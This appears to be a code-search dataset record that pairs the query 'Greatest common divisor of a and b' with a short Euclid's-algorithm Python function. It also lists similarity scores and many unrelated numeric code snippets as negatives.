[ "0.66533923", "0.6577843", "0.6550088", "0.6524935", "0.6478077", "0.6407476", "0.64042294", "0.63701874", "0.63546324", "0.6320073", "0.63194585", "0.63091135", "0.62533474", "0.6244983", "0.62103593", "0.61851996", "0.6173337", "0.61667633", "0.6162774", "0.6149299", "0.61209244", "0.6113393", "0.6094902", "0.6094281", "0.60822403", "0.6078822", "0.6078523", "0.6063073", "0.60520536", "0.60503995", "0.6050318", "0.60373", "0.60362893", "0.6022534", "0.60025316", "0.5992554", "0.59891546", "0.5988465", "0.5984015", "0.59787893", "0.59742844", "0.59738904", "0.59669834", "0.5935209", "0.59284127", "0.5925022", "0.5911113", "0.5908617", "0.58921444", "0.58853257", "0.58691424", "0.5843146", "0.58051974", "0.57847846", "0.57819384", "0.5771267", "0.5763953", "0.5761483", "0.57583326", "0.57565534", "0.5744063", "0.5741492", "0.5736454", "0.5730399", "0.5721543", "0.5721543", "0.5720966", "0.5701215", "0.5684342", "0.56827086", "0.5668614", "0.5661153", "0.5652949", "0.56509215", "0.5647594", "0.5645142", "0.564402", "0.56418824", "0.5641318", "0.5638629", "0.56269217", "0.56100386", "0.5607286", "0.56032336", "0.56001997", "0.5596441", "0.5594669", "0.55882037", "0.5584019", "0.5583847", "0.5583677", "0.5578341", "0.55778897", "0.55775535", "0.55747736", "0.55737936", "0.5569122", "0.55660045", "0.556558", "0.556433" ]
0.62598634
12
Greatest common divisor of a and b
def mcd(a, b):
    while b != 0:
        a, b = b, a % b
    return a
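# Illustrative usage: this is Euclid's algorithm for the gcd.
# mcd(12, 18)  # 6, via (a, b): (12, 18) -> (18, 12) -> (12, 6) -> (6, 0)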
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def denom(self, a):\n return self.one", "def denom(self, a):\n raise NotImplementedError", "def ppcm_denominateurs(self):\n\t\tl = []\n\t\tn = 1\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\t\"\"\" les denominateurs sont positifs \"\"\"\n\t\t\t\te = m.get_coefficient().get_denom().valeur()\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\t\t\tn *= e\n\t\treturn n / pgcd_liste(l)", "def calculate(a: int) -> int:\n if a == 0:\n raise ZeroDivisionError(\"Cannot compute the multiplicative inverse of 0 in a Galois field.\")\n\n r2, r1 = CHARACTERISTIC, a\n t2, t1 = 0, 1\n\n while r1 != 0:\n q = r2 // r1\n r2, r1 = r1, r2 - q * r1\n t2, t1 = t1, t2 - q * t1\n\n if t2 < 0:\n t2 += CHARACTERISTIC\n\n return t2", "def resultado(self):\n return self.__numerador/self.__denominador", "def factor_carga(self):\r\n return self.nelementos() / self.n", "def valor(self):\n nbits = len(self.gens)\n dec = int(self.gens,2)\n real = self.min+dec*((self.max-self.min)/(math.pow(2,nbits)-1))\n return real", "def mortalidade(self):\n self.covidbr['mortalidade'] = self.covidbr['obitosAcumulado'] / \\\n (self.covidbr['populacaoTCU2019'] / (10**5))", "def convertir_interes_efectivo_anula_a_mensual(ea):\n return (1 + ea)**(1/12) - 1", "def multiplicar(self):\n self.resultado = self.valor_1 * self.valor_2", "def Calcular(a: float) ->float:\n \n return (a*2)", "def calculo(self):\n return self.peso / (self.altura * self.altura)", "def problem():\n for a in range(1, 380):\n for b in range(a):\n if a + b + (a**2 + b**2)**0.5 == 1000:\n return int(a * b * (a**2 + b**2)**0.5)", "def restar(self):\n self.resultado = self.valor_1 - self.valor_2", "def bspe(a, b):\n if b-a == 1:\n return MPZ_ONE, MPZ(b)\n m = (a+b)//2\n p1, q1 = bspe(a, m)\n p2, q2 = bspe(m, b)\n return p1*q2+p2, q1*q2", "def multiplicaciones(): #906609 tiene que darme\n ultimo_palindromo = 0\n total = 0\n for primer_numero in range(100, 1000):\n for segundo_numero in range(100, 1000):\n #total se encarga de hacer la multiplicacion entre los numeros\n total = primer_numero * segundo_numero\n # llamamos a la funcion que verifica si la multiplicacion que envia es un palindromo\n if obtener_palindromo(total):\n #luego de verificar que la multiplicacion era palindromo pasamos a evaluarla hasta llegar al ultimo palindromo\n #entre 100 y 1000\n if ultimo_palindromo < total:\n ultimo_palindromo = total\n return ultimo_palindromo", "def calculer_moment_quadratique(longueur_base, hauteur_base_bras):\n return longueur_base * pow(hauteur_base_bras, 3) / 12", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def Mo96(self,dc,nu):\n return 1. 
+ (nu**2.-1.)/dc", "def calculate(self) -> float:", "def calcular_cuota_basica(dependientes):\n\tcuota_basica = 0\n\tif dependientes == 0:\n\t\tcuota_basica = 30\n\telif dependientes == 1:\n\t\tcuota_basica = 60\n\telif dependientes == 2:\n\t\tcuota_basica = 90\n\telif dependientes == 3:\n\t\tcuota_basica = 100\n\telif dependientes == 4:\n\t\tcuota_basica = 120\n\treturn cuota_basica", "def bs(a, b):\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab", "def TCMB(rs):\n\n return 0.235e-3 * rs", "def getETA():", "def getETA():", "def calcular_promedio(lista):\r\n suma = 0\r\n promedio = 0\r\n \r\n for marca in lista:\r\n suma += marca[1]\r\n \r\n promedio = suma//len(lista)\r\n \r\n return promedio", "def exp_mod(a, b, nbr):\n bina = [int(x) for x in bin(a)[2:]]\n #binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n #while len(binn)<len(bina):\n # binn = [0]+binn\n #print(bina, binn)\n binn.reverse()\n bina.reverse()\n n = len(bina)+len(binn)*4+1\n na = len(bina)\n nan = len(bina)+len(binn) # debut de Y\n nany = len(bina)+2*len(binn)+1 # debut de \"A\" (ici c'est b)\n nanya = len(bina)+3*len(binn)+1 # debut de \"APOW\" (ce qui doit etre mesuré)\n q = QuantumRegister(n+2, 'q') # +lost+lost2\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[na+i])\n expmod(circ, q, # X, a, A, APOW, Y, n, N, binn, lost, lost2)\n [q[i] for i in range(len(bina))],\n b%nbr,\n [q[i+nany] for i in range(len(binn))],\n [q[i+nanya] for i in range(len(binn))],\n [q[i+nan] for i in range(len(binn)+1)],\n nbr,\n [q[i+na] for i in range(len(binn))],\n binn,\n q[n],\n q[n+1])\n if len(bina)%2:\n circ_m = measure(circ, q, [i for i in range(nan,nany)])\n else:\n circ_m = measure(circ, q, [i for i in range(nanya,n)])\n #circ_m = measure(circ, q, [i for i in range(n)])\n return circ_m", "def abbott_elec():\n per_kwh = 0.08 # [$/kWh]\n return per_kwh", "def mutual_info(a,b,c,n):\r\n if a == 0: \r\n return 0\r\n print(a,b,c,n) \r\n return log10((a * n) / ((a + c) * (a + b)))", "def find_c(b):\n return (2*(b**2) - 2000*b + 1000000)/(2000 - 2*b)", "def calculate(self):", "def produto(conexao, valores):\n try:\n return '{0}'.format(float(valores[1]) * float(valores[2]))\n except:\n return 'ERRO'", "def my(a,b) :\n c = (a+b)\n d = c *100/160\n return d", "def Manera10(self,dc,nu):\n if len(self.bias_par.keys()) == 0:\n q = 0.709\n p = 0.248\n else:\n q = self.bias_par['q']\n p = self.bias_par['p']\n return 1. 
+ (q*nu**2.-1.)/dc + (2.*p/dc)/(1.+(q*nu**2.)**p)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def get_taum(cm, rm):\n return cm * rm", "def Grundy(x):\n # n taille bianire max des xi; m longeur de x\n \n # Calcul de la longueur binaire utilisée\n # Complexité en O(m)\n \n n = 0\n \n for val in x :\n t = taille(val)\n if n < t :\n n = t\n \n \n \n # Ecriture de la liste x en binaire\n # Complexité en O(m*n) car binaire(x,n) en O(n)\n \n b = [binaire(val,n) for val in x ]\n \n # Calcul de la somme binaire mod 2 :\n # Complexité en O(m*n) : m valeur dans b; n tours de boucle\n \n a = []\n \n for i in range(n):\n \n s = 0\n \n for val in b :\n s+= val[i]\n \n a.append(s%2)\n \n return(decimal(a))", "def compute(dm,do):\n mae = MV.average(MV.absolute(MV.subtract(dm,do)))\n return float(mae)", "def calcula_premio (jugado, ganado_decimo):\n return ganado_decimo * jugado / 20", "def dividir(self):\n self.resultado = self.valor_1 / self.valor_2", "def tasa_efe(tasa_1, n_1, n_2):\n tasa_2 = (1 + tasa_1)**(n_1 / n_2) - 1 \n return tasa_2", "def bisezione(f,a,b,toll=10**-5):\n m = (a+b)/2\n f_m = f(m)\n while abs(f_m) > toll:\n if f(a)*f_m < 0:\n b = m\n elif f(b)*f_m < 0:\n a = m\n elif f_m == 0:\n print(\"Trovata solzione esatta\")\n return m\n else:\n print(\"Metodo fallito\")\n return None\n m = (a+b)/2\n f_m = f(m)\n return m", "def bs(a, b):\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab", "def estimacion01():\n n = 1000 # Simulaciones\n X = generarM()\n M = X # Media Muestral (valor inicial: M(1) = X1)\n S_cuadrado = 0 # Varianza Muestral (valor inicial: S_cuadrado(1) = 0)\n # Calculamos M(n) y S_cuadrado(n)\n for j in xrange(2, n+1):\n X = generarM()\n A = M\n M += (X - M)/float(j)\n S_cuadrado = (1 - 1.0/(j-1))*S_cuadrado + j*((M-A)**2)\n\n S = math.sqrt(S_cuadrado) # Desviacion Estandar Muestral (sigma)\n\n IC = (M - 1.96*(S/math.sqrt(n)) , M + 1.96*(S/math.sqrt(n)))\n\n return M, S_cuadrado, IC", "def convertir_interes_efectivo_anual_a_mensual(interes):\n return (1 + interes)**(1/12) - 1", "def get_M(self):\n return 1.0", "def degree_on_basis(self, b):\n return sum(b)", "def mumo_op(op, mp, mq):\n if op == 3:\n musol = [mp[0] * mq[0], mp[1][:], mp[2][:]]\n for i, v in enumerate(mq[1]): # per cada variable del segon\n if v in musol[1]: # si ja la tenia\n j = musol[1].index(v) # miro on la tinc\n musol[2][j] += mq[2][i] # sumo els graus\n else: # no la tenia\n musol[1].append(mq[1][i]) # l'afegeixo\n musol[2].append(mq[2][i])\n else:\n musol = \"No has pas definit res d'això...\"\n return musol", "def margemLucro(value, args):\n\targs = \"{:.2f}\".format((Decimal(args.split()[1]) - (Decimal(args.split()[0]) * value))/Decimal(args.split()[1])*100)\n\n\treturn args", "def p_transfer(a1, b1, a2, b2, m):\n assert a1 <= NCAR\n assert b1 <= NCAR\n assert a2 <= NCAR\n assert b2 <= NCAR\n\n if a1 < m or b1 < -m:\n return 0\n\n if a2 == 0:\n a2s = (-10, 1)\n elif a2 == NCAR:\n 
a2s = (NCAR, 10+NCAR)\n else:\n a2s = (a2, a2+1)\n\n if b2 == 0:\n b2s = (-10, 1)\n elif b2 == NCAR:\n b2s = (NCAR, 10+NCAR)\n else:\n b2s = (b2, b2+1)\n\n p = 0\n for a2 in range(*a2s):\n for b2 in range(*b2s):\n d1 = a2 - a1 - m\n d2 = b2 - b1 + m\n\n p += poisson_diff(d1, LAM_RENT1, LAM_RET1) * poisson_diff(d2, LAM_RENT2, LAM_RET2)\n\n return p", "def calcular_nuevo_valor_adeudado( capital, interes ) -> float:\n tasames=convertir_interes_efectivo_anula_a_mensual(interes)\n intereses=capital * tasames\n capital= capital + intereses \n\n # TODO: Desarrollar este método\n # AYUDA: usar el método \"convertir_interes_efectivo_anula_a_mensual\" para convertir el interes de anual a mensual\"\"\"\n return round(capital,2)", "def wce(B):\n return eme*B", "def polimumo_op(op, mumopx, mumoqx):\n musol = []\n if op == 1: # suma\n musol = \"Això no existeix encara, gamarús\"\n elif op == 2: # resta\n musol = \"Això no existeix encara, gamarús\"\n elif op == 3: # multi\n for mx in mumopx:\n for my in mumoqx:\n mnou = mumo_op(3, mx, my)\n afegit = False\n for ms in musol: # miro si el puc sumar amb algun dels que ja tenia\n if mumo_semblant(ms, mnou):\n ms[0] += mnou[0] # sumo coefs\n afegit = True\n break\n if not afegit: # si no he pogut l'afegeixo al final\n musol.append(mnou)\n return musol", "def get_b(self):\n return ((self.s_pos / self.n_pos) + (self.s_neg / self.n_neg)) / 2", "def somme_encaissee(self) -> Numeric:\n return query_sum(\n self.offres().filter(paye=True),\n \"prix\",\n output_field=models.DecimalField(),\n )", "def BrittleCoulombMohr(sigmaA, sigmaB, Sut, Suc):\n if sigmaA > sigmaB and sigmaB > 0:\n n = Sut/sigmaA\n elif sigmaA > 0 and sigmaB < 0:\n n = 1/(sigmaA/Sut-sigmaB/Suc)\n elif sigmaA < 0 and sigmaA > sigmaB:\n n = -Suc/sigmaB\n return n", "def get_multiple_ab(a, b): # IN= 2'int' / OUT= 1'foat'\n return float(a*b)", "def hern_bulge_mass(r,b):\n rb = r/b\n return ((rb*rb)/(2*(1+rb)**2.))", "def valorEsperado(obs,ket):\n cal=Calculadora()\n obsSobreket=cal.accion(obs,ket)\n bra=cal.matrizConjugada(obsSobreket)\n ket1=cal.transpuesta([ket])\n bra1=cal.transpuesta(bra)\n car=cal.multiplicacionMatrizMatriz(bra1,ket1)[0][0]\n return car", "def test_atomic_masses():\n first = get_atomic_mass(\"As\")\n assert first == 74.9216\n \n second = get_atomic_mass(\"Be\")\n assert second == 9.012182\n\n third = get_atomic_mass(\"Li\")\n assert third == 6.941", "def getB(self):\n return ((self.bPlusbStar() / self.nPos) + (self.bMinusbStar / self.nNeg)) / 2", "def coefficient(self) -> float:\n ...", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def f(a):\n b = a * 2\n while b.norm().asscalar() < 1000:\n b = b * 2\n if b.sum().asscalar() > 0:\n c = b\n else:\n c = 100 * b\n return c", "def __mul__(self, autre):\n\t\tif self.__valide and autre.__valide:\n\t\t\tp = polynome()\n\t\t\ta = self.liste_decroissante()\n\t\t\tb = autre.liste_decroissante()\n\t\t\tfor m in a:\n\t\t\t\tfor n in 
b:\n\t\t\t\t\tp.ajouter_monome(monome.produit(m, n))\n\t\t\treturn p\n\t\telse:\n\t\t\treturn polynome(False)", "def getFactor(currency):", "def Calc(self, a, b, size):\n self.eq = lambda x: (60000/((b-a)/size*x+a))\n points = []\n names = [str(self.offset)]\n points.append(0)\n for j in range(1, int(size)):\n points.append(integrate.quad(self.eq,0,j)[0])\n names.append(str(points[-1]+self.offset))\n self.beatstr = ' '.join(names)\n return points", "def _compute_linear_magnitude_term(index, M):\r\n if M <= c1:\r\n # this is the second term in eq. (2a), p. 20\r\n return a2 * (M - c1)\r\n else:\r\n # this is the second term in eq. (2b), p. 20\r\n return a7 * (M - c1)", "def _compute_linear_magnitude_term(index, M):\r\n if M <= c1:\r\n # this is the second term in eq. (2a), p. 20\r\n return a2 * (M - c1)\r\n else:\r\n # this is the second term in eq. (2b), p. 20\r\n return a7 * (M - c1)", "def expected_result(self, other):\r\n return float(1) / (1 + math.pow(10, float(other.elo - self.elo) / DIVIDER))", "def mult_mod(a, b, nbr, control):\n bina = [int(x) for x in bin(a)[2:]]\n # binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n while len(binn) < len(bina):\n binn = [0]+binn\n # print(bina, binn)\n binn.reverse()\n bina.reverse()\n n = len(bina)+len(binn)*3+1\n na = len(bina)\n nan = len(bina)+len(binn) # debut de Y\n nany = len(bina)+2*len(binn)+1 # debut de \"A\" (ici c'est b)\n q = QuantumRegister(n+2+1, 'q') # +lost+lost2+control\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[na+i])\n if control:\n circ.x(q[n+2])\n cmultmod(circ, q, # control, X, a, A, Y, n, N, binn, lost, lost2\n q[n+2],\n [q[i] for i in range(len(bina))],\n b,\n [q[i+nany] for i in range(len(binn))],\n [q[i+nan] for i in range(len(binn)+1)],\n nbr,\n [q[i+na] for i in range(len(binn))],\n binn,\n q[n],\n q[n+1])\n circ_m = measure(circ, q, [i for i in range(nan,nany)])\n return circ_m", "def cal_limit(prior_a, posterior_a,prior_b, posterior_b):\n limiter = 0\n a=0\n b=0\n for l in prior_a:\n limiter += math.pow((prior_a[l]-posterior_a[l]),2)\n a+=posterior_a[l]\n for l in prior_b:\n limiter += math.pow((prior_b[l]-posterior_b[l]),2)\n a+=posterior_b[l] \n # a=0 do not meet the condition, need to continue iteration\n if a==0:\n b=1\n print(\"Warning: line.py: sum posterior flow = 0\")\n else:\n b=math.sqrt(limiter)/a\n return b", "def calc(p=12, e=0.1):\n global base, total\n\n for i in range(1, p + 1):\n r = base * e\n print(\"Period: {}\".format(i))\n print(\" Return: {}\".format(r))\n base = base + r + putIn\n print(\" Base: {}\".format(base))\n total = total + 10000 + base\n print(\" Total: {}\".format(total))\n\n comp = pow(1 + e, p)\n print(\"Compound interest:{}\\nPeriod:{}\\nExpect return:{}\".format(comp, p, e))", "def num (self):\n return self.value[0]/self.value[1]", "def solution(self):\n return [(\"the\", 1561900)] * 100", "def __mul__(self,other):\n if(self.denominator*other.denominator<0):\n resultnumerator = -1*self.numerator*other.numerator\n resultdenominator = abs(self.denominator*other.denominator) \n else:\n resultnumerator = self.numerator*other.numerator\n resultdenominator = self.denominator*other.denominator \n newvalues = (resultnumerator,resultdenominator)\n return newvalues", "def SetMoneda(num, simbolo=\"$\", n_decimales=2):\n #con abs, nos aseguramos que los dec. 
sea un positivo.\n n_decimales = abs(n_decimales)\n\n #se redondea a los decimales idicados.\n num = round(num, n_decimales)\n\n #se divide el entero del decimal y obtenemos los string\n num, dec = str(num).split(\".\")\n\n #si el num tiene menos decimales que los que se quieren mostrar,\n #se completan los faltantes con ceros.\n dec += \"0\" * (n_decimales - len(dec))\n\n #se invierte el num, para facilitar la adicion de comas.\n num = num[::-1]\n\n #se crea una lista con las cifras de miles como elementos.\n l = [num[pos:pos+3][::-1] for pos in range(0,50,3) if (num[pos:pos+3])]\n l.reverse()\n\n #se pasa la lista a string, uniendo sus elementos con comas.\n num = str.join(\",\", l)\n\n #si el numero es negativo, se quita una coma sobrante.\n try:\n if num[0:2] == \"-,\":\n num = \"-%s\" % num[2:]\n except IndexError:\n pass\n\n #si no se especifican decimales, se retorna un numero entero.\n if not n_decimales:\n return \"%s %s\" % (simbolo, num)\n\n return \"%s %s.%s\" % (simbolo, num, dec)", "def ilerp(a, b, t):\n return (t - a) / (b - a)", "def amount_4_conto_energia(self, production, verbose=False):\n en_autocons = round( production * self.perc_autocons) \n energia_immessa_in_rete = production - en_autocons\n tot_incentivo_all_prod = production * self.incentivo_all_prod\n if en_autocons < self.used_external_en:\n tot_incentivo_ssp = self.incentivo_ssp * energia_immessa_in_rete\n else:\n tot_incentivo_ssp = self.incentivo_ssp * energia_immessa_in_rete + \\\n self.eccedenze * (en_autocons - self.used_external_en )\n if verbose:\n print(\"\\nincentivo_ssp: \",self.incentivo_ssp)\n print(\"incentivo_all_prod: \",self.incentivo_all_prod)\n print(\"en_autocons \", en_autocons) \n print(\"energia_immessa_in_rete \", energia_immessa_in_rete)\n print(\"tot_incentivo_all_prod \", tot_incentivo_all_prod) \n print(\"tot_incentivo_ssp \", tot_incentivo_ssp)\n \n \n return tot_incentivo_all_prod + tot_incentivo_ssp - self.spese_4", "def problem():\n\n print 'problem #27'\n\n l = 0\n m_a = 0\n m_b = 0\n for a in xrange(-1000, 1000):\n for b in xrange(-1000, 1000):\n p = len(check(a, b))\n if p > l:\n l = p\n m_a = a\n m_b = b\n\n print 'the product of coefficients is %s' % (m_a * m_b)", "def estimacion02():\n n = 1000 # Simulaciones\n X = math.e * poisson(1)\n M = X # Media Muestral (valor inicial: M(1) = X1)\n S_cuadrado = 0 # Varianza Muestral (valor inicial: S_cuadrado(1) = 0)\n # Calculamos M(n) y S_cuadrado(n)\n for j in xrange(2, n+1):\n X = math.e * poisson(1)\n A = M\n M += (X - M)/float(j)\n S_cuadrado = (1 - 1.0/(j-1))*S_cuadrado + j*((M-A)**2)\n\n S = math.sqrt(S_cuadrado) # Desviacion Estandar Muestral (sigma)\n\n IC = (M - 1.96*(S/math.sqrt(n)) , M + 1.96*(S/math.sqrt(n)))\n\n return M, S_cuadrado, IC", "def cost(self,e1,e2):\n pass", "def MAE_rel(self):\n try:\n return(self.MAE / self.price_open)\n except:\n return", "def quo(self, a, b):\n return a / b", "def calceNumerator ( term , numeratorN1 , numeratorN2 ) :\n if term == limit :\n if term % 3 == 0 :\n return ( 2 * int ( term / 3 ) * numeratorN1 ) + numeratorN2\n return numeratorN1 + numeratorN2\n\n multiplier = 1\n if term % 3 == 0 :\n multiplier = 2 * int ( term / 3 )\n numerator = multiplier * numeratorN1 + numeratorN2\n\n return calceNumerator ( term + 1 , numerator , numeratorN1 )", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def __bsa(self, a, b):\n try:\n if a + 1 == b:\n if a == 0:\n p_ab = q_ab = mpz(1)\n else:\n p_ab = mpz((6 * a -5) * (2 * a - 1) * (6 * a - 1))\n q_ab = mpz(a * a * a * self.C3_24)\n t_ab = 
p_ab * (self.A + self.B * a)\n if a & 1:\n t_ab *= -1\n else:\n m = (a + b) // 2\n p_am, q_am, t_am = self.__bsa(a, m)\n p_mb, q_mb, t_mb = self.__bsa(m, b)\n p_ab = p_am * p_mb\n q_ab = q_am * q_mb\n t_ab = q_mb * t_am + p_am * t_mb\n return [p_ab, q_ab, t_ab]\n except Exception as e:\n raise", "def abbott_steam():\n per_klb = 20 # dollars per klb of steam\n kwh_eq = to_kwh(1) # kwh equivalent of steam\n per_kwh = per_klb / kwh_eq\n return per_kwh", "def graphite_entropic_change_PeymanMPM(sto, c_s_max):\n\n du_dT = 10 ** (-3) * (\n 0.28\n - 1.56 * sto\n - 8.92 * sto ** (2)\n + 57.21 * sto ** (3)\n - 110.7 * sto ** (4)\n + 90.71 * sto ** (5)\n - 27.14 * sto ** (6)\n )\n\n return du_dT", "def somme(self) -> Numeric:\n return query_sum(\n self.offre_set.filter(valide=True),\n \"prix\",\n output_field=models.DecimalField(),\n )", "def FO2(lam):\n return 1.096 + 1.385 *1e-3 *lam**(-2) + 1.448 *1e-4 *lam**(-4)", "def n_wyraz(a1,nr_wyrazu,r):\n return a1+(nr_wyrazu-1)*r", "def item_tres(n):\n if n <= 0.167:\n return 0\n elif n > 0.167 and n <= 0.333:\n return 1\n elif n > 0.333 and n <= 0.500:\n return 2\n elif n > 0.500 and n <= 0.667:\n return 3\n elif n > 0.667 and n <= 0.834:\n return 4\n elif n > 0.834 and n <= 1.000:\n return 5", "def molar_mass_dry_air():\n return 28.9647", "def mw (mva, pf):\r\n x= mva*1000000\r\n y=x*pf/1000000\r\n return y", "def _momentum_unit(eq):\n mp=1.66e-27; A=2;\n q=1.602e-19; Z=1\n B = np.abs(eq.B0EXP)\n R = eq.R0EXP\n\n mom_unit= Z*q*B*R**2 #pphi=pphi[SI]*pphi_unit\n energy_unit = mp*A/(Z*Z*q*q*R**2*B**2) #E=E[J]*energy_unit\n mu_unit = mp*A/(Z*Z*q*q*R**2*B) #mu=mu[SI]*mu_unit\n return mom_unit, energy_unit, mu_unit", "def algo_Euclide_etendu(a,b):\n r1=a\n u1=1\n v1=0\n r2=b\n u2=0\n v2=1\n while r2!=0 : #Invariants de boucle : r1=u1*a+v1*b et r2=u2*a+v2*b\n q=r1//r2\n rs=r1 ; us=u1 ; vs=v1 #Variables de sauvegarde\n r1=r2 ; u1=u2 ; v1=v2\n r2 = rs - q*r2 # r2 <- Reste de la division euclidienne de r1 par r2\n u2 = us - q*u2\n v2 = vs - q*v2\n return(r1,u1,v1) #On prend le dernier reste non nul.", "def succ(self, a):\n#das self.control Dictionary wird unter \"analyse\" aufgebaut; wird hier eingelesen\n n, absucc = self.control[a.name]\n if n == 0: return 0.0\n else: return float(absucc) / float(n)", "def alturamax(gravedad, veli):\r\n #se realiza varias operacione para encontrar la altura maxima \r\n maxima=(veli/2)*(veli/gravedad)\r\n #se regresa el valor de maxima\r\n return maxima", "def calc_mad(a,b):\n comb = a + b\n idx = np.array(range(len(a)))[~np.isnan(comb)]\n a1=a[idx]\n b1=b[idx]\n N = len(a1)\n mad = np.sum(np.abs(a1-b1))/N\n return mad", "def __cacula_agio(table):\n from m2py.misc.vectorize import column\n\n PV = table[0][-1]\n total = sum(column(table, 1))\n premium = total/PV - 1\n return round(premium, 2)" ]
[ "0.64670295", "0.63709563", "0.6305553", "0.6273303", "0.62383693", "0.62260216", "0.6183728", "0.61380094", "0.61126524", "0.61095035", "0.6071675", "0.6056668", "0.60076785", "0.5992859", "0.5985773", "0.5965909", "0.5937595", "0.5930666", "0.5926027", "0.59098005", "0.59063566", "0.5883996", "0.58507204", "0.584081", "0.584081", "0.58372307", "0.5820651", "0.5813368", "0.5810271", "0.578832", "0.57832706", "0.57637686", "0.57511914", "0.57484865", "0.57457757", "0.5731912", "0.57315487", "0.572053", "0.57197875", "0.5703543", "0.5693956", "0.5691738", "0.56886035", "0.56850535", "0.56779397", "0.56713384", "0.566788", "0.5665312", "0.56651646", "0.5664775", "0.5656234", "0.56475693", "0.56435496", "0.5643407", "0.56168664", "0.56101155", "0.5607972", "0.5602767", "0.55906695", "0.55880857", "0.55695605", "0.55676717", "0.55656797", "0.55639213", "0.55589145", "0.5543361", "0.55430233", "0.5533229", "0.5533229", "0.55300736", "0.55287796", "0.55241096", "0.552266", "0.5522197", "0.5516766", "0.55144703", "0.55141413", "0.5505582", "0.5500749", "0.549922", "0.5492686", "0.54834735", "0.5482", "0.5480569", "0.54786336", "0.5477743", "0.5477298", "0.54734373", "0.54728276", "0.54708034", "0.54660445", "0.54638565", "0.5461722", "0.5446306", "0.544545", "0.5444949", "0.54341125", "0.5429386", "0.542864", "0.54239714", "0.5422654" ]
0.0
-1
Returns a list with all the prime numbers up to and including n, using the sieve of Eratosthenes method
def primi(n):
    # Sieve of Eratosthenes: start from the candidates 2..n
    numVec = []
    for x in range(n-1):
        numVec.append(x+2)
    # Cross out (zero) the multiples of every surviving candidate
    for num in numVec[:(n//2-1)]:
        if numVec[num-2] != 0:
            numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1)
    # Keep only the entries that were never crossed out
    numVec = [x for x in numVec if x != 0]
    return numVec
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mk_lst_atnum(self):\n\t\telem_rnge=[]\n\t\tfor i in self.atom_num_lst:\n\t\t\tel_strt=i[0]\n\t\t\tel_end=i[1]\n\t\t\trnge_sect=range(el_strt,el_end+1)\n\t\t\telem_rnge.extend(rnge_sect)\n\t\telements=[]\n\t\tfor i in elem_rnge:\n\t\t\telement=Element.from_Z(i)\t# Indice -> pymatgen element object\n\t\t\telements.append(element)\n\t\treturn elements\n\t\tprint elements", "def listes(Mi, Ma, N):\n if N == 0:\n yield []\n elif Ma - Mi < N:\n yield None\n else:\n # Avec Mi + 1\n for reste in listes(Mi + 1, Ma, N - 1):\n if reste != None:\n yield [Mi + 1] + reste\n \n # Sans Mi + 1\n for reste in listes(Mi + 1, Ma, N):\n if reste != None:\n yield reste", "def pgcd_numerateurs(self):\n\t\tl = []\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\te = abs(m.get_coefficient().get_num().valeur())\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\treturn pgcd_liste(l)", "def grAList() -> list:\n return [2, 5, 6, 9, 10, 11, 13, 17, 18, 30]", "def mots_Nlettre(L:list, n)->list:\n lst= []\n mot = 0\n for i in range(len(L)):\n mot = L[i] 